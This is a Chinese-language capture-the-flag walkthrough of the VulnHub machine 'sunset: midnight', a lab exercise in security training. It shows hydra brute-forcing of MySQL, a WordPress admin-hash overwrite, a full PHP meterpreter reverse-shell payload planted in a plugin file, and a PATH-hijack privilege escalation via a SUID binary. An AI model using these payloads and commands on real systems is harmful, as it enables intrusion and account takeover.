sunset: midnight

https://www.vulnhub.com/entry/sunset-midnight,517/

主机发现端口扫描

  1. 探测存活主机,8是靶机

    nmap -sP 192.168.56.0/24                              
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 16:49 CST
    Nmap scan report for 192.168.56.1
    Host is up (0.00044s latency).
    MAC Address: 0A:00:27:00:00:14 (Unknown)
    Nmap scan report for 192.168.56.2
    Host is up (0.00028s latency).
    MAC Address: 08:00:27:37:A2:CB (Oracle VirtualBox virtual NIC)
    Nmap scan report for 192.168.56.8
    Host is up (0.00039s latency).
    MAC Address: 08:00:27:A6:DF:28 (Oracle VirtualBox virtual NIC)
    Nmap scan report for 192.168.56.10
    
  2. 扫描靶机所有开放端口

    nmap -sT -min-rate 10000 -p- 192.168.56.8   
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 16:50 CST
    Nmap scan report for sunset-midnight (192.168.56.8)
    Host is up (0.0012s latency).
    Not shown: 65532 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    3306/tcp open  mysql
    MAC Address: 08:00:27:A6:DF:28 (Oracle VirtualBox virtual NIC)
    
  3. 扫描服务版本及系统版本

    nmap -sV -sT -O -p 22,80,3306 192.168.56.8
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 16:51 CST
    Nmap scan report for sunset-midnight (192.168.56.8)
    Host is up (0.00052s latency).PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
    3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
    MAC Address: 08:00:27:A6:DF:28 (Oracle VirtualBox virtual NIC)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 4.X|5.X
    OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
    OS details: Linux 4.15 - 5.8
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

    nmap -script=vuln -p 22,80,3306 192.168.56.8                                                                                                                                                                  
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 16:51 CST                                                                                                                                                
    Nmap scan report for sunset-midnight (192.168.56.8)                                                      
    Host is up (0.00042s latency).                                                                           PORT     STATE SERVICE                                                                                   
    22/tcp   open  ssh                                                                                       
    80/tcp   open  http     
    | http-wordpress-users:                                                                                                                                                                                           
    | Username found: admin                                                                                                                                                                                           
    |_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'                                                                                                               
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                                                                                  
    |_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                                                             
    | http-enum:                                                                                             
    |   /blog/: Blog                                                                                         
    |   /wp-login.php: Possible admin folder                                                                 
    |   /wp-json: Possible admin folder                                                                      
    |   /robots.txt: Robots file                                                                             
    |   /readme.html: Wordpress version: 2                                                                   
    |   /: WordPress version: 5.4.2                                                                                                                                                                                   
    |   /feed/: Wordpress version: 5.4.2                                                                                                                                                                              
    |   /wp-includes/images/rss.png: Wordpress version 2.2 found.                                                                                                                                                     
    |   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.                                                                                                                                               
    |   /wp-includes/images/blank.gif: Wordpress version 2.6 found.                                                                                                                                                   
    |   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.                                                                                                                                                
    |   /wp-login.php: Wordpress login page.                                                                 
    |   /wp-admin/upgrade.php: Wordpress login page.                                                         
    |   /readme.html: Interesting, a readme.                                                                 
    |_  /contact/: Potentially interesting folder                                                                                                                                                                     
    3306/tcp open  mysql                                                                                                                                                                                              
    |_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)                                                                                                                                       
    MAC Address: 08:00:27:A6:DF:28 (Oracle VirtualBox virtual NIC)     
    

    靶机CMS是wordpress ,确定版本后可以查询公开漏洞进行利用

    并且扫出mysql可能存在cve2012-2122

web渗透

  1. 知道CMS是wordpress,就用wpscan来扫一下

    wpscan --url http://sunset-midnight/  
    _______________________________________________________________  __          _______   _____                            \ \        / /  __ \ / ____|                                                                    \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ \  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                   WordPress Security Scanner by the WPScan Team                                                   Version 3.8.27                                                                  Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                          
    _______________________________________________________________                                          [i] It seems like you have not updated the database for some time.                                       
    [?] Do you want to update now? [Y]es [N]o, default: [N]n                                                 
    [+] URL: http://sunset-midnight/ [192.168.56.8]                                                          
    [+] Started: Thu Dec  5 17:56:06 2024                                                                    Interesting Finding(s):                                                                                  [+] Headers                                                                                              | Interesting Entry: Server: Apache/2.4.38 (Debian)  | Found By: Headers (Passive Detection)                                                                 | Confidence: 100%                                                                                      [+] robots.txt found: http://sunset-midnight/robots.txt                                                  | Interesting Entries:                                                                                  |  - /wp-admin/                                                                                         |  - /wp-admin/admin-ajax.php                                                                           | Found By: Robots Txt (Aggressive Detection)                                                           | Confidence: 100%[+] XML-RPC seems to be enabled: http://sunset-midnight/xmlrpc.php| Found By: Direct Access (Aggressive Detection)                                                        | Confidence: 100%                                                                                      | References:                                                                     |  - http://codex.wordpress.org/XML-RPC_Pingback_API                                                    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/                  |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/                         |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://sunset-midnight/readme.html   | Found By: Direct Access (Aggressive Detection)                                                        | Confidence: 100%                                                                                      [+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/                     | Found By: Direct Access (Aggressive Detection)                                                        | Confidence: 100%                                                                                      [+] The external WP-Cron seems to be enabled: http://sunset-midnight/wp-cron.php| Found By: Direct Access (Aggressive Detection)                                                        | Confidence: 60%                                                                                       | References:                                                                                           |  - https://www.iplocation.net/defend-wordpress-from-ddos                                              |  - https://github.com/wpscanteam/wpscan/issues/1299                                                   [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).                               | Found By: Rss Generator (Passive Detection)                                                           |  - http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>              |  - http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>       [+] WordPress theme in use: twentyseventeen                                                              | Location: http://sunset-midnight/wp-content/themes/twentyseventeen/                                   | Last Updated: 2024-07-16T00:00:00.000Z                                                                | Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt                           | [!] The version is out of date, the latest version is 3.7                                             | Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507            | Style Name: Twenty Seventeen                                                                          | Style URI: https://wordpress.org/themes/twentyseventeen/                                              | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...| Author: the WordPress team                       | Author URI: https://wordpress.org/                                                                    |                                                                                                       | Found By: Css Style In Homepage (Passive Detection)                                                   | Confirmed By: Css Style In 404 Page (Passive Detection)                                    |                                                                                                       | Version: 2.3 (80% confidence)                                                                         | Found By: Style (Passive Detection)                                                                   |  - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
    [+] Enumerating All Plugins (via Passive Methods)                                                        
    [+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] Plugin(s) Identified:                                                                                [+] simply-poll-master                                                                                   | Location: http://sunset-midnight/wp-content/plugins/simply-poll-master/                               |                                                                                                       | Found By: Urls In Homepage (Passive Detection)                                                        | Confirmed By: Urls In 404 Page (Passive Detection)                           |                                                                                                       | Version: 1.5 (100% confidence)                                                                        | Found By: Readme - Stable Tag (Aggressive Detection)                                                  |  - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt                            | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)                                       |  - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt                            [+] Enumerating Config Backups (via Passive and Aggressive Methods)                                      Checking Config Backups - Time: 00:00:01 <==========> (137 / 137) 100.00% Time: 00:00:01[i] No Config Backups Found.                                                                             [!] No WPScan API Token given, as a result vulnerability data has not been output.                       
    [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register    [+] Finished: Thu Dec  5 17:56:14 2024                                                                   
    [+] Requests Done: 172                                                                                   
    [+] Cached Requests: 7                                                                                   
    [+] Data Sent: 43.472 KB                                                                                 
    [+] Data Received: 444.822 KB
    [+] Memory used: 331.578 MB                         
    [+] Elapsed time: 00:00:08  
    

    版本为version 5.4.2 ,模板用的是twentyseventeen ,没扫到插件

  2. 网上没找到什么漏洞可以利用的

cve2012-2122

  1. 上边nmap扫描出可能存在cve2012-2122 ,我们尝试利用

    msf6 > search 2012-2122 
    msf6 exploit(multi/handler) > use 0 
    msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set rhosts 192.168.56.8
    rhosts => 192.168.56.8                              
    msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run                                            [+] 192.168.56.8:3306     - 192.168.56.8:3306 The server allows logins, proceeding with bypass test      
    [*] 192.168.56.8:3306     - 192.168.56.8:3306 Authentication bypass is 10% complete                      
    [*] 192.168.56.8:3306     - 192.168.56.8:3306 Authentication bypass is 20% complete                      
    [*] 192.168.56.8:3306     - 192.168.56.8:3306 Authentication bypass is 30% complete                      
    [*] 192.168.56.8:3306     - 192.168.56.8:3306 Authentication bypass is 40% complete                      
    [*] 192.168.56.8:3306     - 192.168.56.8:3306 Authentication bypass is 50% complete                      
    [*] 192.168.56.8:3306     - 192.168.56.8:3306 Authentication bypass is 60% complete                      
    [*] 192.168.56.8:3306     - 192.168.56.8:3306 Authentication bypass is 70% complete                      
    [*] 192.168.56.8:3306     - 192.168.56.8:3306 Authentication bypass is 80% complete                      
    [*] 192.168.56.8:3306     - 192.168.56.8:3306 Authentication bypass is 90% complete                      
    [*] 192.168.56.8:3306     - 192.168.56.8:3306 Authentication bypass is 100% complete                     
    [-] 192.168.56.8:3306     - 192.168.56.8:3306 Unable to bypass authentication, this target may not be vulnerable
    [*] 192.168.56.8:3306     - Scanned 1 of 1 hosts (100% complete)                                         
    [*] Auxiliary module execution completed
    

    但是没有利用成功

暴力破解

  1. 没有思路了,可以尝试下暴力破解,wordpress我们枚举出了admin用户,mysql我们尝试破解root用户,同时进行破解

  2. 暴力破解wordpress

    wpscan --url http://sunset-midnight/ -U admin --passwords /usr/share/wordlists/rockyou.txt
    
  3. 暴力破解mysql

    hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.56.8 mysql
    
  4. 很快就爆破出了mysql的密码

    hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.56.8 mysql
    Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-05 23:13:16
    [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
    [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
    [DATA] attacking mysql://192.168.56.8:3306/
    [3306][mysql] host: 192.168.56.8   login: root   password: robert
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-05 23:13:21
    

    密码是robert

数据库寻找敏感信息

  1. 利用Navicat登录mysql ,寻找WP的用户表

    在这里插入图片描述

    发现密码,不过是加密的

  2. 通过hash-identifier 识别

    hash-identifier     ##########################################################################     __  __                     __           ______    _____           #  #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         ##    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        ##     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       ##      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      ##       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      ##        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 ##                                                             By Zion3R ##                                                    www.Blackploit.com ##                                                   Root@Blackploit.com ##########################################################################
    --------------------------------------------------HASH: $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ Possible Hashs:
    [+] MD5(Wordpress)
    
  3. 尝试破解没破解出来

  4. 创建了一个MD5替换上去即可

    下边是123456MD5值,将其替换上去

    e10adc3949ba59abbe56e057f20f883e
    

    在这里插入图片描述

  5. 尝试登陆WP后台

后台getshell

  1. 尝试登录WP后台,密码是上边替换上去的123456

    在这里插入图片描述

  2. PluginsPlugin Editor 的右上角的Select plugin to edit 选择Simply Poll 然后select

    在这里插入图片描述

  3. 然后选择simply-poll.php 进行修改,写入phpinfo进行测试

    在这里插入图片描述

  4. 路径为 /wp-content/plugins/simply-poll-master/simply-poll.php ,访问

    在这里插入图片描述

    测试成功

  5. 直接上线MSF (.10kali IP)

    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set lhost 192.168.56.10
    msf6 exploit(multi/handler) > set lport 1234
    msf6 exploit(multi/handler) > run
    

    然后再msfvenom生成payload ,然后将代码写入到上边的simply-poll.php

    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.10 lport=1234 -f raw            
    [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
    [-] No arch selected, selecting arch: php from the payload
    No encoder specified, outputting raw payload
    Payload size: 1114 bytes/*<?php /**/ error_reporting(0); $ip = '192.168.56.10'; $port = 1234; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
    

    在这里插入图片描述

  6. 然后再次访问/wp-content/plugins/simply-poll-master/simply-poll.php MSF获取到shell

    msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.56.10:1234 
    [*] Sending stage (39927 bytes) to 192.168.56.8
    [*] Meterpreter session 1 opened (192.168.56.10:1234 -> 192.168.56.8:50890) at 2024-12-05 23:59:21 +0800meterpreter > 
    

提权

  1. 查看权限

    meterpreter > sysinfo
    Computer    : midnight
    OS          : Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
    Meterpreter : php/linuxmeterpreter > getuid
    Server username: www-data$ ip add
    ip add
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
    2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000link/ether 08:00:27:a6:df:28 brd ff:ff:ff:ff:ff:ffinet 192.168.56.8/24 brd 192.168.56.255 scope global dynamic enp0s3valid_lft 431sec preferred_lft 431secinet6 fe80::a00:27ff:fea6:df28/64 scope link valid_lft forever preferred_lft forever
    
  2. 寻找敏感文件

    • /var/www/html/wp-config.php 发现jose账号密码(加密)

      /** MySQL database username */                                                                                                                               
      define( 'DB_USER', 'jose' );                                                                                                                                 /** MySQL database password */                                                                                                                               
      define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' ); 
      
  3. 尝试破解

    看起来是MD5,使用开膛手以及在线网站破解,无果

  4. 最后尝试直接使用这串字符串登录

    ssh jose@192.168.56.8  
    jose@192.168.56.8's password: 
    Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Sat Jul 18 15:33:29 2020 from 192.168.100.139
    jose@midnight:~$ 
    

    登陆成功。。。神经

  5. 寻找敏感文件

    • 家目录下user.txt

      jose@midnight:~$ cat user.txt 
      956a9564aa5632edca7b745c696f6575
      

      应该是flag

    • suid

      jose@midnight:~$ find / -perm -u=s -type f 2>/dev/null
      /usr/bin/su
      /usr/bin/sudo
      /usr/bin/status
      /usr/bin/chfn
      /usr/bin/passwd
      /usr/bin/chsh
      /usr/bin/umount
      /usr/bin/newgrp
      /usr/bin/mount
      /usr/bin/gpasswd
      /usr/lib/eject/dmcrypt-get-device
      /usr/lib/dbus-1.0/dbus-daemon-launch-helper
      /usr/lib/openssh/ssh-keysign
      
  6. suid发现/usr/bin/status 尝试执行

    jose@midnight:/tmp$ status
    sh: 1: service: not found
    Status of the SSH server:
    

    去寻找了service,但是没找到

  7. 思路:在新建service然后里边是提权代码,让status去找它(通过环境变量)

    • 新建service文件

      jose@midnight:/tmp$ echo "/bin/bash" > service
      jose@midnight:/tmp$ chmod 777 service 
      
    • 修改环境变量,将/tmp目录放在前头(看目录进行修改)

      jose@midnight:/tmp$ export PATH=/tmp:$PATH
      jose@midnight:/tmp$ echo $PATH
      /tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
      
    • 运行status

      jose@midnight:/tmp$ /usr/bin/status
      root@midnight:/tmp# 
      

      获得root!!!

  8. 读取flag

    root@midnight:~# cd /root
    root@midnight:/root# ls
    root.txt  status  status.c
    root@midnight:/root# cat root.txt ___   ____/' --;^/ ,-_\     \ | // / --o\ o-\ \\   --(_)--/-/-/|o|-|\-\\|\\   / | \'`  ` |-|   `` '|-||-|O|-(\,__...|-|\--,\_....,;;;;;;;;;;;;;;;;;;;;;;;;,.
    ~,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,  ______   ---------   _____     ------db2def9d4ddcb83902b884de39d426e6Thanks for playing! - Felipe Winsnes (@whitecr0wz)
    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/63359.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

伊克罗德与九科信息共同发布RPA+AI智能机器人解决方案

12月12日&#xff0c;伊克罗德信息在上海举办“创见AI&#xff0c;迈进智能化未来——科技赋能零售电商”活动&#xff0c;与九科信息、亚马逊云科技共同探讨与分享&#xff0c;融合生成式AI技术和智能自动化&#xff08;RPA,Robotic Process Automation&#xff09;在电商零售…

从 CephFS 到 JuiceFS:同程旅行亿级文件存储平台构建之路

随着公司业务的快速发展&#xff0c;同程旅行的非结构化的数据突破 10 亿&#xff0c;在 2022 年&#xff0c;同程首先完成了对象存储服务的建设。当时&#xff0c;分布式文件系统方面&#xff0c;同程使用的是 CephFS&#xff0c;随着数据量的持续增长&#xff0c;CephFS 的高…

固定资产分类,提升资产盘活效益

固定资产是企业长期使用的重要资源&#xff0c;涵盖范围广、种类多&#xff0c;不同的资产需要针对性管理。通过科学的分类与高效的盘活策略&#xff0c;不仅可以优化资源配置&#xff0c;还能提升企业资产的利用效率和经济效益。以下将详细解析固定资产的分类方式和盘活效益的…

【字符串匹配算法——BF算法】

&#x1f308;个人主页: Aileen_0v0 &#x1f525;热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法 ​&#x1f4ab;个人格言:“没有罗马,那就自己创造罗马~” 文章目录 BF算法介绍及过程演示代码实现过程下节预告KMP算法利用next数组存储子串中j回退的位置&#xff08;…

Linux 文件系统目录结构及其简要介绍

Hello! 亲爱的小伙伴们&#xff0c;大家好呀&#xff08;Smile~&#xff09;&#xff01;我是 H u a z z i Huazzi Huazzi&#xff0c;欢迎观看本篇博客&#xff0c;接下来让我们一起来学习一下Linux 文件系统目录结构吧&#xff01;祝你有所收获&#xff01; 本篇博客的目录&a…

小米准备入局Nas?Nas究竟是啥?能干啥?

一开头就来了个三连问&#xff1a;小米准备入局Nas&#xff1f;Nas究竟是啥&#xff1f;Nas能干啥&#xff1f; 好像这段时间Nas这个词频频出现&#xff0c;但很多小伙伴都不知道这个是什么设备。首先咱们来解决一下名词Nas是什么意思。 什么是Nas&#xff1f; 为了尽可能解释…

基于Socket实现客户端和服务端的Tcp通信(C#)

0.前言 使用C#和Unity实现复刻Liar’s bar中的功能 软件开发大作业 本系列文章用于记录与分享开发过程中使用到的知识点&#xff0c;以及常见错误 本文主要描述有关网络编程的内容 目录 0.前言1.使用Socket搭建Server1.1Server端的Socket连接1.2 Server端接收Client的信息1.3…

游戏AI实现-寻路算法(A*)

A*&#xff08;A-star&#xff09;是一种图遍历和寻路算法&#xff0c;由于其完整性、最优性和最佳效率&#xff0c;它被用于计算机科学的许多领域。给定一个加权图、一个源节点和一个目标节点&#xff0c;该算法将找到从源到目标的最短路径&#xff08;相对于给定的权重&#…

汽车供应链 “剧变”开始,“智能感知潜在龙头”诞生

智能汽车产业链“剧变”已经开启&#xff0c;智能感知软硬件能力的权重正在不断被放大。 比如满足高阶泊车的第二代AK2超声波传感器、满足人机共驾场景需求的电子外后视镜&#xff08;CMS&#xff09;、iTOF 3D成像视觉感知&#xff08;用于舱内监控&#xff09;等新产品&…

Latex中表格添加底部文本注释并调整对齐

如何实现从第一个表到第三个表的转换&#xff0c; 其中主要涉及到两点&#xff1a; &#xff08;1&#xff09;底部脚注与表格自动对齐并缩进换行 &#xff08;2&#xff09;表格自适应页面宽度 底部脚注的对齐与换行缩进需要用到 \usepackage{threeparttable} \usepackage{…

html基础-认识html

1.什么是html html是浏览器可以识别的的标记语言&#xff0c;我们在浏览器浏览的网页就是一个个的html文档 <!DOCTYPE html> <html> <head> <meta charset"utf-8"> <title>认识html</title> </head> <body><h1…

利用高德API获取整个城市的公交路线并可视化(七)

本篇文章是对我们从高德拿到的公交/地铁的json文件的精细化处理的一个深入解析&#xff0c;通过对这些原始数据进行详细的清洗、转换和分析&#xff0c;我们通过对数据的质量和可用性的提升&#xff0c;来为后续的数据精细化处理和研究做基础数据的支撑&#xff0c;从而为后续的…

OGV格式如何转换成MP4格式?五款视频格式转换工具

在数字时代&#xff0c;视频已成为我们日常生活、工作和学习中不可或缺的一部分。而不同的设备和平台往往支持不同的视频格式&#xff0c;这就需要对视频进行格式转换。 OGV&#xff08;Ogg Video File&#xff09;是一种使用OGG开源格式的容器&#xff0c;用于存储带或不带音频…

番外篇 | Hyper-YOLO:超图计算与YOLO架构相结合成为目标检测新的SOTA !

前言:Hello大家好,我是小哥谈。Hyper-YOLO,该方法融合了超图计算以捕捉视觉特征之间复杂的高阶关联。传统的YOLO模型虽然功能强大,但其颈部设计存在局限性,限制了跨层特征的融合以及高阶特征关系的利用。Hyper-YOLO在骨干和颈部的联合增强下,成为一个突破性的架构。在COC…

C语言小练习-打印字母倒三角

编写一个程序&#xff0c;在用户输入某个大写字母后&#xff0c;产生一个金字塔图案。 #include <stdio.h>int main(int argc,char *argv[]) {char ch; loop:printf("请输入大写字母&#xff01;\n");scanf("%c",&ch);getchar();if(ch < A ||…

FutureCompletableFuture实战

1. Callable&Future&FutureTask介绍 直接继承Thread或者实现Runnable接口都可以创建线程&#xff0c;但是这两种方法都有一个问题就是&#xff1a;没有返回值&#xff0c;也就是不能获取执行完的结果。因此java1.5就提供了Callable接口来实现这一场景&#xff0c;而Fu…

阿尔茨海默症数据集,使用yolo,voc,coco格式对2013张原始图片进行标注,可识别轻微,中等和正常的症状

阿尔茨海默症数据集,使用yolo&#xff0c;voc&#xff0c;coco格式对2013张原始图片进行标注&#xff0c;可识别轻微&#xff0c;中等&#xff0c;严重和正常的症状 数据集分割 训练组100&#xff05; 2013图片 有效集&#xff05; 0图片 测试集&#xf…

[代码随想录21二叉树]二叉树的修改和改造,修剪二叉树,将有序数组转为二叉搜索树

前言 二叉树章节最后的题目了&#xff0c;就是对搜索二叉树的改造&#xff0c; 题目链接 669. 修剪二叉搜索树 - 力扣&#xff08;LeetCode&#xff09; 108. 将有序数组转换为二叉搜索树 - 力扣&#xff08;LeetCode&#xff09; 一、修剪二叉搜索树 思路&#xff1a;等会…

事务-介绍与操作四大特性

一.数据准备&#xff1a; 1.员工表&#xff1a; -- 员工管理 create table tb_emp (id int unsigned primary key auto_increment comment ID,username varchar(20) not null unique comment 用户名,password varchar(32) default 123456 comment 密码,n…

Golang学习历程【第一篇 入门】

Golang学习历程【第一篇 入门Hello World】 1. 学习文档2. Window 本地安装Go2.1 安装2.2 验证 3. 开发环境——VsCode3.1 VsCode 安装3.2 安装插件3.2.1 language 语言汉化插件安装3.2.2 Go插件安装 4. Hello World 入门4.1 建工程4.2 创建项目文件4.3 编写Hello World程序4.4…